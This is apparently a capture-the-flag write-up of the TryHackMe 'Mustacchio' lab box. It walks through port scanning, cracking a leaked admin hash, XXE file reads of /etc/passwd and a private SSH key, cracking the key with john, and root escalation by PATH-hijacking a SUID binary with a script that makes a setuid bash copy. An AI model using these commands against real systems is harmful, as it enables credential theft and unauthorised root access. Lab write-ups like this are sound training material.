6 minute read


Mustacchio is an easy rated Linux room on Tryhackme by zyeinn. A backup file is found on Port 80 which contains the login credentials for another webserver on Port 8765. The webserver is vulnerable to XXE through which a private key for local user is exfiltrated. On the box, a SUID binary is exploited to get root privileges.


Full Port Scan

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ sudo nmap -p- --min-rate 10000 -v -oN nmap/all-ports -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-12 09:04 +0545
Nmap scan report for
Host is up (0.20s latency).
Not shown: 65533 filtered ports
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 14.13 seconds
           Raw packets sent: 131078 (5.767MB) | Rcvd: 3 (132B)

Detail Scan

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ sudo nmap  -sC -sV -v
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-12 09:24 +0545
Nmap scan report for
Host is up (0.23s latency).
Not shown: 998 filtered ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d3:9e:50:66:5f:27:a0:60:a7:e8:8b:cb:a9:2a:f0:19 (RSA)
|   256 5f:98:f4:5d:dc:a1:ee:01:3e:91:65:0a:80:52:de:ef (ECDSA)
|_  256 5e:17:6e:cd:44:35:a8:0b:46:18:cb:00:8d:49:b3:f6 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry  
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP Service on Port 80

image image One strange thing on the home page is the copyright date, which is from the future.

Fuzzing with ffuf

image All the html pages contains static pages. /custom gives us a 301, so let us check that out.

Checking /custom


Backup file inside /custom/js


Downloading the users.bak file

Checking file format

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ file users.bak 
users.bak: SQLite 3.x database, last written using SQLite version 3034001

It is a sqlite database backup.

Contents of the database

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ sqlite3 users.bak
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite> .dump
PRAGMA foreign_keys=OFF;
        "id"    INTEGER,
        "username"      TEXT,
        "password"      TEXT,
        "role"  INTEGER
INSERT INTO users VALUES(1,'admin','1868e36a********************d4bc5f4b',NULL);

We get a username and a hash.

Trying to crack the hash

Before trying to crack the hash on my own box, I like to search online if any match for the hash can be found. image And the hash is successfully cracked. Even though we have login credentials we do not know where to login. Since SSH is open, let us try if those credentials work with SSH.

Trying to login with SSH

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ ssh admin@
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:g//RSEsVCZF6FIydF0R24Gmek8fI6D7kRnDXF3fNK9Y.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
admin@ Permission denied (publickey).

Looks like password based authentication is disabled on the box.

Full Port Scan

Since I had used --min-rate 10000 flag, which sends 10000 packets per second while doing the full port scan, our nmap scan have missed other open ports on the box. So, let us do another full port scan with only 1000 packets per second.

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ sudo nmap -p- --min-rate 1000
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-12 09:25 +0545
Nmap scan report for
Host is up (0.24s latency).
Not shown: 65532 filtered ports
22/tcp   open  ssh
80/tcp   open  http
8765/tcp open  ultraseek-http

This time we get another open port.

Visting HTTP Service on Port 8765


If we try to login with the earlier obtained credentials, we successfully log in. image

Submiting the comment

image Interesting Things

  • a url /auth/dontforget.bak
  • User Barry which is a local user on the box
  • POST Parameter is called xml

Content of the backup file

image Contains a xml. Let us try and submit the same xml on the xml parameter on /home.php.

Checking if we can reflect xml on the page


Our content is reflected on the respnse. Let us check if this webapp is vulnerable to XXE.

XXE Check

image We are able to read the content of /etc/passwd. There are two users on the box except root which have a login shell.

  • Barry (/home/barry)
  • Joe (/home/joe)

Since the comment on the /home.php hints on the SSH key pair of user barry, let us check if the file is present.

Trying to read barry private key from .ssh folder


We can read barry’s private SSH key but it looks like it is encrypted.

We can use SSH2john to try and crack the password.

Using ssh2john to convert into hash

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ /opt/john/john/run/ssh2john.py barry | tee hash

Cracking the hash using john

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ur******es       (barry)     
1g 0:00:00:01 DONE (2021-06-12 10:14) 0.6993g/s 2077Kp/s 2077Kc/s 2077KC/s urieljr.k..urielfabricio07
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Hash is successfully cracked.

Trying to ssh into box as user barry

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ chmod 600 barry 
reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ ssh barry@ -i barry 
Enter passphrase for key 'barry': 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)


barry@mustacchio:~$ id
uid=1003(barry) gid=1003(barry) groups=1003(barry),4(adm)

And we login successfully. Just glancing at the groups, we are in the adm group which means we can read few sensitive log files(syslog, auth.log).

Reading user.txt

barry@mustacchio:~$ cat user.txt 

Privilege Escalalation

Content on joe home directory

image A binary is found on joe’s home directory which is owned by root and has setuid bit set on it. If we manage to find any misconfiguartion on this binary, we can probably get code execution as root since this binary runs with the effective privileges of root.

Downloading the binary

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ scp -i barry barry@ .
Enter passphrase for key 'barry': 
live_log                                                                                             100%   16KB  37.8KB/s   00:00    

Reversing the binary in Ghidra

image The code is pretty simple. It just gets the content of the file /var/log/nginx/access.log

Since relative path is used for tail binary, we maybe able to create a tail binary on the home directory of user joe and get code execution.

Checking if we have write Permission

barry@mustacchio:/home/joe$ ls -la
total 28
drwxr-xr-x 2 joe  joe   4096 Apr 29 20:32 .
drwxr-xr-x 4 root root  4096 Apr 29 20:32 ..
-rwsr-xr-x 1 root root 16832 Apr 29 20:32 live_log
barry@mustacchio:/home/joe$ touch tail
touch: cannot touch 'tail': Permission denied

We do not have write permission.

Checking logs

Since we are on adm group, let us check us log file if we can get anything interesting. image Joe password is in plain text on the log files.

Checking if the password works

barry@mustacchio:/var/log$ su - joe
su: Authentication failure
barry@mustacchio:/var/log$ su - joe
: No such file or directory

If I try right password, it says No such file or directory and if I try the wrong password, it says Authentication Failure. This means we have write password but something is wrong with su binary.

Even though the password works, I can not find a way to get a shell as user joe.

Path hijacking

Let us create a custom tail binary and try to hijack the path.

Content of tail

barry@mustacchio:/dev/shm$ cat tail 
cp /bin/bash /tmp/bash
chmod 4777 /tmp/bash

Modifying PATH variable

barry@mustacchio:/dev/shm$ export PATH=`pwd`:$PATH

Executing the live_log

barry@mustacchio:/dev/shm$ /home/joe/live_log 
Live Nginx Log Reader

Logs are not shown which is a good sign.

Checking if /tmp/bash exists

barry@mustacchio:/dev/shm$ ls -la /tmp/bash
-rwsrwxrwx 1 root root 1037528 Jun 12 05:07 /tmp/bash

The binary exists and has SUID bit set on it and is owned by root.

Getting a root shell

barry@mustacchio:/dev/shm$ /tmp/bash -p
bash-4.3# id
uid=1003(barry) gid=1003(barry) euid=0(root) groups=1003(barry),4(adm)

Reading root.txt

bash-4.3# cat root.txt